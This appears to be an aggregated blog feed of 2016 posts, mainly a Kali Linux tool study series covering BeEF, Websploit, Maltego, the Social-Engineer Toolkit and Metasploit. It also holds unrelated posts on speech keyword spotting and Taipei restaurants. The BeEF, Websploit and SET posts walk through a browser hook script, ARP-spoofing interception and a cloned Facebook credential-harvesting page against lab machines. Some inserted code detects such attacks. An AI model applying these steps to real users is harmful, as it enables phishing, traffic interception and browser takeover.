File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 88, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 73, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
return func(*args,**kw)
File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 627, in _doReadOrWrite
self._disconnectSelectable(selectable, why, inRead)
File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 260, in _disconnectSelectable
selectable.connectionLost(f)
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 484, in connectionLost
self._commonConnection.connectionLost(self, reason)
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 298, in connectionLost
protocol.connectionLost(reason)
File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 474, in connectionLost
self.handleResponseEnd()
File "/root/sslstrip-0.9.2/src/sslstrip/ServerConnection.py", line 119, in handleResponseEnd
HTTPClient.handleResponseEnd(self)
File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 485, in handleResponseEnd
self.handleResponse(b)
File "/root/sslstrip-0.9.2/src/sslstrip/ServerConnection.py", line 133, in handleResponse
self.client.write(data)
File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 962, in write
raise RuntimeError('Request.write called on a request after '
exceptions.RuntimeError: Request.write called on a request after Request.finish was called.
The experiment didn’t work, and I may come back to this if I find something new.

Reference

by Heron Yang (noreply@blogger.com) at April 06, 2016 07:55 AM

DoS v.s. DDoS

People like to mix up DoS with DDoS, which are similar but different. Referring to Wikipedia, we get:

DoS: A denial-of-service (DoS) attack is an attempt to make a machine or network resource unavailable to its intended users, such as to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet.

DDoS: A distributed denial-of-service (DDoS) is where the attack source is more than one, often thousands of, unique IP addresses.

Difference

DoS is launched by one machine; in contrast, DDoS is launched by distributed machines.

Referring to DDoS attack - Distributed Denial of Service, we get: “A Denial of Service (DoS) attack is different from a DDoS attack. The DoS attack typically uses one computer and one Internet connection to flood a targeted system or resource. The DDoS attack uses multiple computers and Internet connections to flood the targeted resource. DDoS attacks are often global attacks, distributed via botnets.”

Who Mixed Them Up?

I’ve been seeing this mistake for a long time; people keep mixing up these two names. If the attack was launched from only one machine, then it’s called DoS instead of DDoS. Some examples of people who got it wrong here:

Why This Matters?

DoS is easy to launch and easy to defend against. On the other hand, DDoS is always a big threat in the current world, since victims have a difficult time distinguishing the bad guys from the large number of users. DDoS is a serious problem that we should focus on (see the Digital Attack Map hosted by Google); and those who claim that what they were doing was a DDoS attack when it was actually a DoS attack should stop delivering wrong information to the public.

How To Launch DDoS Then?

Too bad, I’ve never launched a DDoS attack before, and I believe it’s illegal as well. However, the following is some information about it if you’re interested in knowing more. And one should NOT apply it to real machines/networks unless he/she fully understands the consequences.

First of all, you need a botnet, that is, a set of distributed machines under your control. Bad guys buy botnets on the black market. Those machines are usually ones that have been hacked, so attackers can control them via the backdoor left on the machine.

Then, the attacker will have all the bot machines send requests to the victim. The requests arrive at a high frequency, so the victim cannot handle all of them (it runs out of memory or CPU), and eventually the service freezes. UFONet is one tool I found online, written in Python, that is designed to test/launch DDoS attacks.

by Heron Yang (noreply@blogger.com) at April 06, 2016 05:14 AM

April 04, 2016

Keyword Spotting for Controlling Window Background Color

This is a small test program that uses both CMUSphinx and GTK+ to demonstrate a keyword spotting (KWS) algorithm.

KWS is the technique used to detect a keyword at any time. Yes, this is the technique applied for “Okay, Google” and “Hey, Siri”. Whenever the keyword is heard by the machine, some callback function will be fired.

History

  • Originally: Hidden Markov Model (HMM) systems
  • Google, 2014: Deep Neural Network (DNN), shown to outperform the HMM system
  • Google, 2015: Convolutional Neural Networks (CNNs), shown to outperform the DNN
    • ignore input topology, as the (fixed) input can be presented in any order without affecting the performance of the network
    • not explicitly designed to model translational variance within speech signals, which can exist due to different speaking styles / capture translational invariance with far fewer parameters by averaging the outputs of hidden units

Tools

CMU Sphinx Project by Carnegie Mellon University

  • CMU LTI, Language Technology Institute
  • Designed to be adopted on different platforms including iOS, Android, Raspberry Pi, etc.
  • License: BSD-style (nice!)

Raspberry Pi 2 – Speech Recognition on device

  • Upload word list to http://www.speech.cs.cmu.edu/tools/lmtool-new.html
  • Link .lm and .dict file, command: pocketsphinx_continuous -inmic yes -lm 0730.lm -dict 0730.dic -samprate 16000/8000/48000

My Code

Github link: https://github.com/heronyang/kws-color-demo

Components

In main.c, the program fires up a thread for handling GUI jobs right after it starts. Then, it sets up pocketsphinx and calls recognize_from_microphone or recognize_from_file for the audio input. Since argc/argv is passed into the settings, the user can specify the dictionary file or log file, as is done in run.sh.

Run

> ./run.sh

Demo


by Heron Yang (noreply@blogger.com) at April 04, 2016 09:16 AM

April 01, 2016

Kali Tool Series - BeEF

“BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.”

How It Works

Basically, first start the BeEF server, then let the victim run hook.js in his/her browser, and we can learn information about the victims’ machines or control them.

Start BeEF Server

> beef-xss 
[*] Please wait as BeEF services are started.
[*] You might need to refresh your browser once it opens.
[*] UI URL: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

Then, open the browser with URL http://127.0.0.1:3000/ui/panel on Kali, and you’ll see the BeEF Control Panel.

Let Victim Run hook.js

I’m not including strategies for getting people to run hook.js in the real world, which I believe involve some social engineering. Instead, I am running a simple server on Kali on a port other than 3000 (used by the BeEF server), then letting the victim open the webpage which has hook.js embedded.

Setup the Web Page
Usually, some deception may be involved here, but I am ignoring that for study purposes. What I built is barely more than a blank page with the label “hello”. Save the following page as index.html somewhere on Kali.
<!DOCTYPE html>
<html>
  <head>
  </head>
  <body>
    <h1>hello</h1>
    <script src="http://192.168.63.155:3000/hook.js"></script>
  </body>
</html>
192.168.63.155 is the IP of Kali, which is a local IP, so only other machines on the same local network can access it later on.

Setup the Web Server
I am using Python Simple HTTP Server, so:
> python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
And the web server will start and listen on port 8000.

Victim Visit
As Kali is running in a VM, I visit the site I just set up from my host machine (Mac). Simply opening http://192.168.63.155:8000 will work.

Control the Victim

On Kali, you can see a new item pop up in the left-hand list. You can start to read the victim’s information or control it.

What You Can Do

On the command tab in the BeEF Control Panel, you can see a list of actions you can perform on the victim. Well, in my experiment, quite a lot of them don’t work, possibly because the browsers had fixed the security flaw, or just because the BeEF code wasn’t up to date.
On the BeEF Control Panel, the different colored circles next to the actions represent different statuses:
  • green : works on the target; invisible.
  • orange : works on the target; visible.
  • grey : must yet be verified if it works.
  • red : does not work on the target.
Here, I will list some actions I found working.

Play Sound

This command plays a sound on the target machine given the sound’s URL. I randomly searched on www.findsounds.com, and got this link:
http://princezze.free.fr/sounds/laugh.MP3
Put it into the panel, and it works.


iFrame Event Logger

This one allows the attacker to open website by providing the URL. It won’t work on the sites that check its origin. That is, if you try to open Google.com, then you will get following error in the victim’s browser console.
[Error] Refused to display 'https://www.google.com/?gws_rd=ssl' in a frame because it set 'X-Frame-Options' to 'SAMEORIGIN'.
But, it’s fine if you open other simple websites like http://www.heron.me/.
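Whether a site can be framed like this is decided by two response headers. The following is an added example, not part of the original post: a Python check that evaluates X-Frame-Options and, going beyond the error shown above, the CSP frame-ancestors directive that overrides it. The function names and the sample header values are constructed for illustration, and CSP source matching is a simplified subset with exact scheme matching.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """Return the (scheme, host, port) origin of an http(s) URL."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    return scheme, host, parts.port or DEFAULT_PORTS.get(scheme)


def frame_ancestors(policy):
    """Return the frame-ancestors source list of one CSP policy, or None."""
    for directive in policy.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return tokens[1:]
    return None


def source_allows(source, parent_url, framed_url):
    """Match one CSP source expression against the embedding page.

    Simplified subset: 'none', 'self', *, scheme sources such as https:,
    and host sources with optional scheme, port and leading "*." wildcard.
    """
    src = source.lower()
    p_scheme, p_host, p_port = origin(parent_url)
    if src == "'none'":
        return False
    if src == "'self'":
        return origin(parent_url) == origin(framed_url)
    if src == "*":
        return p_scheme in DEFAULT_PORTS
    if src.endswith(":"):
        return p_scheme == src[:-1]
    scheme, _, rest = src.rpartition("://")
    host, _, port = rest.split("/", 1)[0].partition(":")
    if scheme and scheme != p_scheme:
        return False
    if port.isdigit():
        if int(port) != p_port:
            return False
    elif port != "*" and p_port != DEFAULT_PORTS.get(p_scheme):
        return False  # no port in the source: only the default port matches
    if host.startswith("*."):
        return p_host.endswith(host[1:])
    return p_host == host


def may_be_framed(headers, framed_url, parent_url):
    """Return (allowed, reason) for showing framed_url in a frame on parent_url.

    headers maps lower-cased header names to lists of values. Only one level
    of framing is modelled; browsers check every ancestor frame.
    """
    policies = []
    for value in headers.get("content-security-policy", []):
        for policy in value.split(","):
            sources = frame_ancestors(policy)
            if sources is not None:
                policies.append(sources)
    if policies:
        # With frame-ancestors present, browsers ignore X-Frame-Options.
        for sources in policies:
            if not any(source_allows(s, parent_url, framed_url) for s in sources):
                return False, "blocked by CSP frame-ancestors"
        return True, "allowed by CSP frame-ancestors"

    xfo = set()
    for value in headers.get("x-frame-options", []):
        xfo.update(t.strip().lower() for t in value.split(",") if t.strip())
    if len(xfo) > 1:
        if xfo & {"deny", "sameorigin", "allowall"}:
            return False, "blocked: conflicting X-Frame-Options values"
        return True, "allowed: X-Frame-Options invalid, header ignored"
    if xfo == {"deny"}:
        return False, "blocked by X-Frame-Options DENY"
    if xfo == {"sameorigin"}:
        if origin(parent_url) == origin(framed_url):
            return True, "allowed: same origin"
        return False, "blocked by X-Frame-Options SAMEORIGIN"
    if xfo:
        return True, "allowed: X-Frame-Options invalid, header ignored"
    return True, "allowed: no framing restriction sent"


if __name__ == "__main__":
    # Constructed case matching the post: the hooked page frames Google.
    print(may_be_framed({"x-frame-options": ["SAMEORIGIN"]},
                        "https://www.google.com/?gws_rd=ssl",
                        "http://192.168.63.155:8000/"))
```

A site that sends neither header, or only the obsolete ALLOW-FROM value, comes out as frameable; `frame-ancestors 'self'` is the setting that closes that gap.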



Execute JavaScript Code

This is the point. As the attack was triggered by the user when he/she ran hook.js, all further actions are done by passing JavaScript code from the attacker to the victim. So, “executing JavaScript code” on the attacker’s demand brings the maximum flexibility.




Other

Some commands don’t show the result on the control panel, or they are shown somewhere I couldn’t find. So, I switched to my favorite Terminal, and found the results.
They are saved in a sqlite .db file; by using the sqlite tool, we can access the results:
> cd /var/lib/beef-xss
> sqlitebrowser beef.db
Check the core_results table for the results.


Reference

by Heron Yang (noreply@blogger.com) at April 01, 2016 08:47 AM

March 30, 2016

Electronics Retailers

Large Online Retailers

← Older revision Revision as of 16:47, 30 March 2016
Line 8: Line 8:
 
* [http://www.mouser.com/ Mouser]
 
* [http://www.mouser.com/ Mouser]
 
* [http://twen.rs-online.com/web/ RS-Online]
 
* [http://twen.rs-online.com/web/ RS-Online]
 +
* [http://www.onlinecomponents.com/ Online Components]
  
 
== Taiwanese Online Retailers ==
 
== Taiwanese Online Retailers ==

by Zeejack.tech at March 30, 2016 04:47 PM

User:Zeejack.tech

User account Zeejack.tech was created

by Zeejack.tech at March 30, 2016 04:44 PM


Heron's Notes

Kali Tool Series - Websploit

Although it seems that there are handier tools for web exploits than Websploit, it still interests me by having an interface similar to Metasploit's.

To Start

> websploit

__ __ ___ ____ _____ ____ _ ___ ____ ______
| |__| | / _]| \ / ___/| \| | / \| || |
| | | | / [_ | o )( \_ | o ) | | || | | |
| | | || _]| | \__ || _/| |___ | O || | |_| |_|
| ` ' || [_ | O | / \ || | | || || | | |
\ / | || | \ || | | || || | | |
\_/\_/ |_____||_____| \___||__| |_____| \___/|____| |__|


--=[WebSploit FrameWork
+---**---==[Version :2.0.5 BETA
+---**---==[Codename :We're Not Crying Wolf
+---**---==[Available Modules : 19
--=[Update Date : [r2.0.5-000 2.3.2014]



wsf >

Show available modules

wsf > show modules

Web Modules                     Description
-------------------             ---------------------
web/apache_users                Scan Directory Of Apache Users
web/dir_scanner                 Directory Scanner
web/wmap                        Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma                         PHPMyAdmin Login Page Scanner
web/cloudflare_resolver         CloudFlare Resolver


Network Modules                 Description
-------------------             ---------------------
network/arp_dos                 ARP Cache Denial Of Service Attack
network/mfod                    Middle Finger Of Doom Attack
network/mitm                    Man In The Middle Attack
network/mlitm                   Man Left In The Middle Attack
network/webkiller               TCP Kill Attack
network/fakeupdate              Fake Update Attack Using DNS Spoof
network/arp_poisoner            Arp Poisoner


Exploit Modules                 Description
-------------------             ---------------------
exploit/autopwn                 Metasploit Autopwn Service
exploit/browser_autopwn         Metasploit Browser Autopwn Service
exploit/java_applet             Java Applet Attack (Using HTML)


Wireless / Bluetooth Modules    Description
-------------------             ---------------------
wifi/wifi_jammer                Wifi Jammer
wifi/wifi_dos                   Wifi Dos Attack
wifi/wifi_honeypot              Wireless Honeypot(Fake AP)
bluetooth/bluetooth_pod         Bluetooth Ping Of Death Attack

Cases

Here, I am going to try some modules in Websploit. And, the target will be my own Metasploitable2 virtual machine. Make sure you don’t try any actions described here on a running machine that doesn’t belong to you.

Scan Directories

We are scanning the directories on the target machine by brute force, using HTTP requests. As far as I know, DirBuster is also well known for doing this job. This kind of scan is easy for the target machine to notice, since lots of invalid requests are sent in a short period.

wsf > use web/dir_scanner
wsf:Dir_Scanner > show options

Options      Value
---------    --------------
TARGET       http://google.com

wsf:Dir_Scanner > set target http://192.168.63.156
TARGET => 192.168.63.156

wsf > run

However, I don’t think the program does a good job, as it doesn’t print results as it goes; the user might have to wait until it has completed, and that usually takes a long time.
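The burst of invalid requests mentioned above is what a defender looks for in the web server's access log. The following is an added example, not part of the original post: a Python detector that flags a client once it has requested many distinct missing paths inside a short sliding window. The thresholds, function names and log lines are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache common/combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return (ip, timestamp, path, status) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["path"], int(m["status"])


def find_dir_scanners(lines, window_s=10, min_misses=8, min_miss_ratio=0.8):
    """Return {client_ip: time of first alert}.

    A client alerts when, within window_s seconds, it has requested at least
    min_misses distinct paths that returned 404 and at least min_miss_ratio
    of its requests in that window were 404s.
    """
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)  # ip -> (timestamp, path, was_404) in window
    alerts = {}
    for line in lines:
        record = parse_line(line)
        if record is None:
            continue
        ip, ts, path, status = record
        queue = recent[ip]
        queue.append((ts, path, status == 404))
        while ts - queue[0][0] > window:
            queue.popleft()  # drop requests that fell out of the window
        missed_paths = {p for _, p, miss in queue if miss}
        miss_ratio = sum(1 for _, _, miss in queue if miss) / len(queue)
        if (ip not in alerts and len(missed_paths) >= min_misses
                and miss_ratio >= min_miss_ratio):
            alerts[ip] = ts
    return alerts


def sample_log():
    """Constructed log lines (not captured traffic) for two behaviours."""
    lines = ['192.168.63.1 - - [30/Mar/2016:17:30:00 +0800] '
             '"GET / HTTP/1.1" 200 891']
    # A visitor following stale links: nine 404s, but only one per minute.
    for minute in range(31, 40):
        lines.append('192.168.63.1 - - [30/Mar/2016:17:%02d:00 +0800] '
                     '"GET /old/page%d.html HTTP/1.1" 404 209'
                     % (minute, minute))
    # A client guessing directory names: ten requests inside two seconds.
    guesses = ["admin", "backup", "cgi-bin", "config", "db",
               "phpMyAdmin", "test", "tmp", "uploads", "old"]
    for i, name in enumerate(guesses):
        status = 200 if name == "phpMyAdmin" else 404
        lines.append('192.168.63.155 - - [30/Mar/2016:17:30:%02d +0800] '
                     '"GET /%s/ HTTP/1.1" %d 300' % (2 + i // 5, name, status))
    return lines


if __name__ == "__main__":
    for ip, when in find_dir_scanners(sample_log()).items():
        print("possible directory scan from", ip, "at", when.isoformat())
```

The window length matters: with the default 10 seconds only the guessing client alerts, while a one-hour window would also flag the visitor with stale links.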

Man in the Middle

Man in the Middle is an interesting attack. The attacker stays silent, intercepts the victim's network traffic, and then passes it on. That is, the victim may not notice that his/her traffic is being monitored by the attacker.

Attacker side:

wsf > use network/mitm
wsf:MITM > show options

Options      Value           RQ     Description
---------    --------------  ----   --------------
Interface    eth0            yes    Network Interface Name
ROUTER       192.168.1.1     yes    Router IP Address
TARGET       192.168.1.2     yes    Target IP Address
SNIFFER      driftnet        yes    Sniffer Name (Select From Sniffer List)
SSL          true            yes    SSLStrip, For SSL Hijacking(true or false)


Sniffers        Description
------------    --------------
dsniff          Sniff All Passwords
msgsnarf        Sniff All Text Of Victim Messengers
urlsnarf        Sniff Victim Links
driftnet        Sniff Victim Images

wsf:MITM > set TARGET 192.168.63.156
TARGET => 192.168.63.156
wsf:MITM > set ROUTER 192.169.63.1
ROUTER => 192.169.63.1
wsf:MITM > set SNIFFER urlsnarf
SNIFFER => urlsnarf
wsf:MITM > run
[*]IP Forwarding ...
[*]ARP Spoofing ...
[*]Sniffer Starting ...
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]

Then, the victim starts to browse the Internet. I’m letting the victim run wget google.com to simulate Internet surfing.

Back to the attacker, here’s what he/she received:

192.168.63.156 - - [30/Mar/2016:17:36:16 +0800] "GET http://google.com/ HTTP/1.0" - - "-" "Wget/1.10.2"
192.168.63.156 - - [30/Mar/2016:17:36:26 +0800] "GET http://www.google.com.tw/?gfe_rd=cr&ei=D577VtbIMZCS9QWylY-AAw HTTP/1.0" - - "-" "Wget/1.10.2"
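The "ARP Spoofing" step in the module output works by making the victim's ARP cache point the router's IP at the attacker's MAC address, and that change is visible on the victim. The following is an added example, not part of the original post: a Python check that compares two snapshots of `ip neigh show` output taken on the same host. The function names, the gateway address and the MAC addresses in the sample are constructed.

```python
import re
from collections import defaultdict

# One line of `ip neigh show`, e.g.
#   192.168.63.1 dev eth0 lladdr 00:50:56:c0:00:08 REACHABLE
NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) dev (?P<dev>\S+) "
    r"lladdr (?P<mac>[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\b"
)

# Constructed snapshots of the victim's neighbour table (MACs are made up).
BEFORE = """\
192.168.63.1 dev eth0 lladdr 00:50:56:c0:00:08 REACHABLE
192.168.63.155 dev eth0 lladdr 00:0c:29:11:22:33 STALE
192.168.63.254 dev eth0 FAILED
"""
AFTER = """\
192.168.63.1 dev eth0 lladdr 00:0c:29:11:22:33 REACHABLE
192.168.63.155 dev eth0 lladdr 00:0c:29:11:22:33 REACHABLE
"""


def parse_neigh(text):
    """Parse `ip neigh show` output into {ip: mac}.

    Entries without a link-layer address (FAILED, INCOMPLETE) are skipped.
    """
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m["ip"]] = m["mac"].lower()
    return table


def arp_anomalies(before, after, gateway_ip):
    """Compare two neighbour tables taken on the same host.

    Returns a sorted list of findings:
      ("mac-changed", ip, old_mac, new_mac)  an IP now resolves to a new MAC
      ("mac-shared", mac, (ip, ...))         one MAC answers for the gateway
                                             and for other addresses too
    """
    findings = []
    for ip, mac in after.items():
        old = before.get(ip)
        if old is not None and old != mac:
            findings.append(("mac-changed", ip, old, mac))
    by_mac = defaultdict(list)
    for ip, mac in after.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if gateway_ip in ips and len(ips) > 1:
            findings.append(("mac-shared", mac, tuple(sorted(ips))))
    return sorted(findings)


if __name__ == "__main__":
    for finding in arp_anomalies(parse_neigh(BEFORE), parse_neigh(AFTER),
                                 gateway_ip="192.168.63.1"):
        print(finding)
```

A replaced router also changes the gateway's MAC, so a "mac-changed" finding alone needs confirmation; the gateway sharing a MAC with another host is the stronger signal. The sniffed lines above were plain HTTP requests, which is the traffic TLS would have kept unreadable.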

Reference

by Heron Yang (noreply@blogger.com) at March 30, 2016 09:46 AM

March 29, 2016

Kali Tool Series - Maltego

Maltego is a reconnaissance tool developed by Paterva and built into Kali. It is a powerful information-gathering tool that covers everything from Internet infrastructure to personal information and social networks.

Palette

Palette, here, refers to the object types supported by Maltego for drawing the network graph of the target. Each object type represents an item in the real world and carries relevant attributes. By running transform actions, we can expand one object into the whole network of interest.
Maltego's Palette contains the following types:
  • Device
  • Infrastructure
    • AS
    • DNS Name
    • Domain
    • IPv4 Address
    • MX Record
    • NS Record
    • Netblock
    • URL
    • UniqueIdentifier
    • Website
  • Locations
    • Circular Area
    • GPS Coordinate
    • Location
  • Personal
    • Alias
    • Document
    • Email Address
    • Image
    • Person
    • Phone Number
    • Phrase
  • Social Network
    • Facebook
    • Twitter

Steps

Step 1 - Open Maltego
Open Maltego at Application menu → Information Gathering → Maltego (or just type maltego in Terminal), then register an account and select the transform seeds to install.
Step 2 - Pick a Start Node
You can start from a website URL, a person, or anything else mentioned above in the Palette.
Step 3 - Expand
Right-click on the object, then perform a “transform” action, which will expand the graph by adding more connections to other objects.

Example Output


Information gathering starting from my domain, heron.me.


Information gathering starting from me, "Heron Yang".

Transform Seeds

Seeds are small pieces of XML that tell the Maltego client where it should look (at which servers) for transforms. Seeds can be thought of as something like the index of a book where you can use that to see where the relevant content is located.

Reference

by Heron Yang (noreply@blogger.com) at March 29, 2016 09:36 AM

March 27, 2016

March 26, 2016

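Vegetarian Group Dining Options in Taipei

Every time I have a group meal with friends I have to look up the links again and send them out, so I might as well write them down here and just share the link to this post from now on.

Note: not every dish at these restaurants is vegan: there are ovo-lacto vegetarian dishes, vegetarian dishes containing the five pungent vegetables, and vegan dishes. Remember to ask before your meal according to your own needs.

Reservation needed one to two weeks in advance

  • (Hong Kong-style dim sum) 養心茶樓: official site, review. Near Songjiang Nanjing Station.
  • (Western + Chinese buffet) 果然匯: official site, review. Near Zhongxiao Dunhua Station.
  • (Italian) Miacucina: review. Several branches, two of them near the Zhongxiao Fuxing and Xihu MRT stations.
  • (Western set menu) 舒果新米蘭蔬食: official site, review. Several branches, some of them near NTU Hospital Station, Guting Station and Songjiang Nanjing Station.

No reservation needed (may be needed for more than four people)

  • (Japanese udon) 穗科手打烏龍麵: official site, review. Two branches, near Zhongshan Junior High School Station and Zhongxiao Dunhua Station respectively.
  • (Chinese family-style dishes) 祥和蔬食精緻料理: review. Near Shandao Temple Station.
  • (Hot pot, grilled skewers, other) 愛家光復店: official site, review
  • (Thai family-style dishes) 京品泰味素食: official site, review. Closest by bus; some distance from Zhongxiao Xinsheng Station and Dongmen Station.

Notes

  • I occasionally go to 穗科 or 愛家光復店 for dinner on my own; I can eat at a leisurely pace and read a book or browse my phone, which is quite nice.
  • Other good restaurants not listed above (not listed only because they are a bit far from central Taipei or I was too lazy to type...): 長春素食, 寬心園, 陽明春天, 浣花草堂, TRIO義式庭園蔬食, 頤園素食小館.
  • Said to be good but not tried yet: 京兆尹, 鈺善閣.
  • 綠舍奇蹟 in Hsinchu is quite good.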

by fcamel (noreply@blogger.com) at March 26, 2016 05:20 AM

March 25, 2016

Kali Tool Series - The Social-Engineer Toolkit

Preface

“Social Engineering” is a sub-field of network security. It has much less to do with technical matters and more to do with deceiving people in order to gain unauthorized access to a system.

The content here is for study purposes only; one SHOULD NOT deploy it in a real-world environment, which is illegal. While you practice, make sure you test on your own machines only and don’t defraud people.

Build a Phishing Website

As a basic example, we build a fake login website for people to enter a username and password.
> setoolkit

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com

Select from the menu:

1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

set> 1
Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules

99) Return back to the main menu.

set> 2

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method

99) Return to Main Menu

set:webattack> 3

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu

set:webattack>1
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
Then it asks for the IP of your Kali machine, which you can find with the ifconfig command. Mine is 192.168.63.155 here.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.63.155

1. Java Required
2. Google
3. Facebook
4. Twitter
5. Yahoo

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.63.155
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.facebook.com/

[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Apache is set to ON - everything will be placed in your web root directory of apache.
[*] Files will be written out to the root directory of apache.
[*] ALL files are within your Apache directory since you specified it to ON.
Apache webserver is set to ON. Copying over PHP file to the website.
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt
Feel free to customize post.php in the /var/www directory
[*] All files have been copied to /var/www
{Press return to continue}
Now, you’re all set. By default, the files are generated at /var/www/. However, we have to put them into /var/www/html/, which is the default folder of Apache.
> cd /var/www/
> mkdir html/facebook
> mv index.html html/facebook/
> mv post.php har*txt html/
Okay, then open the url (mine is http://192.168.63.155/facebook/) on any machine that can reach your Kali machine.



Finally, you will get the username and password in the harvester_….txt file:
> cat /var/www/html/har*.txt
Array
(
[lsd] => AVqaOX85
[display] =>
[enable_profile_selector] =>
[isprivate] =>
[legacy_return] => 1
[profile_selector_ids] =>
[skip_api_login] =>
[signed_next] =>
[trynum] => 1
[timezone] => -825
[lgndim] => eyJ3IjoxNDQwLCJoIjo5MDAsImF3IjoxNDQ… =
[lgnrnd] => 194144_MLVw
[lgnjs] => 1458894004
[email] => apple
[pass] => banana
[login] => 1
[default_persistent] => 0
[qsstamp] => W1tbOSwxMiwWEtwbVV6am45Zzd3…
)

by Heron Yang (noreply@blogger.com) at March 25, 2016 08:39 AM

March 19, 2016

Kali Tool Series - Metasploit

Preface

This is the first post of Kali Tool Series I wrote as my own studying notes.

Introduction

Metasploit is a vulnerability and exploitation framework with a collection of exploits designed for security professionals to perform security assessments.

A few facts about Metasploit:

  • written in Ruby
  • acquired by Rapid7
  • integrates with other common penetration testing tools: Nessus, Nmap

Also, it’s worth knowing that a successful service exploitation requires the following elements (reference):

  • vulnerability: a flaw in a system which can be utilized as an avenue of attack
  • exploit: a program specifically designed to leverage a vulnerability
  • payload: code to be run on the system after the vulnerability has been exploited

Modules

Before starting, it’s better to briefly understand its modules, which can be roughly grouped as follows (reference is here):

Auxiliary modules

Useful tools for things like:

  • information gathering
  • enumeration
  • port scanning
  • connecting to SQL databases
  • etc

Exploit modules

Modules used to deliver exploit code to a target system.

Post modules

Post-exploitation tools for things like extracting password hashes/access tokens, taking screenshots, key-logging and downloading files.

Payload modules

Malicious payloads used after an exploitation. In Metasploit, it’s better to upload a copy of the “meterpreter” payload, which opens a meterpreter backdoor smoothly.

Testing Environment

Since what we are doing here may make changes to (or, you could say, damage) the target machine, we can’t do this on a deployed machine without permission. Therefore, I set up a Metasploitable virtual machine as my target, which contains lots of vulnerabilities by default.

Both the target (Metasploitable) and the attacker (Kali) are virtual machines under the same local network in my following tests.

Working Flow

Here’s a demo flow using Metasploit.

1. Information Gathering

Host Discovery

First, we have to locate the machine by scanning my local network (192.168.0.x).

I’m using ARP scanning:

msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
INTERFACE                   no        The name of the interface
RHOSTS                      yes       The target address range or CIDR identifier
SHOST                       no        Source IP Address
SMAC                        no        Source MAC Address
THREADS    1                yes       The number of concurrent threads
TIMEOUT    5                yes       The number of seconds to wait for new data

msf auxiliary(arp_sweep) > set RHOSTS 192.168.63.0-255
RHOSTS => 192.168.63.0-255
msf auxiliary(arp_sweep) > run

[*] 192.168.63.1 appears to be up (VMware, Inc.).
